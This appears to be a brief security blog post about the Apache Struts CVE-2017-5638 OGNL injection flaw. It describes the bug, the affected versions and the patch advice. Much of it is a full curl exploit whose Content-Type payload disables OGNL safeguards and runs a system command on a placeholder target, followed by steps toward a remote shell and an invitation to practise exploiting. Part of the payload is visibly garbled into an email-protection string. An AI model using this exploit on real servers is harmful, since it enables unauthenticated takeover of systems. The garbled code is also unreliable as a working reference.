Listen to this Post
How the mentioned CVE works:
The CVE-2017-5638 vulnerability exists in the Jakarta Multipart parser of Apache Struts. The flaw is triggered when a malicious `Content-Type` header is sent in an HTTP request for file upload. The parser incorrectly processes the header value, attempting to evaluate it as an Object-Graph Navigation Language (OGNL) expression. An attacker can craft a `Content-Type` header containing a malicious OGNL expression. Because the evaluation occurs with insufficient safeguards, this allows the attacker to execute arbitrary system commands on the server with the same privileges as the Struts application. This provides a direct path to full server compromise without requiring authentication, making it a highly critical remote code execution flaw.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='whoami').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/struts2-showcase/fileupload/doUpload.action
How Exploit:
Craft malicious Content-Type header.
Send HTTP request with OGNL payload.
Execute arbitrary system commands.
Gain remote shell access.
Protection from this CVE:
Upgrade to Struts 2.3.32 or 2.5.10.1.
Apply vendor security patch immediately.
Implement WAF rules filtering OGNL patterns.
Disable file upload functionality if unused.
Impact:
Complete server compromise.
Unauthenticated remote code execution.
Data breach and system control.
Critical infrastructure risk.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

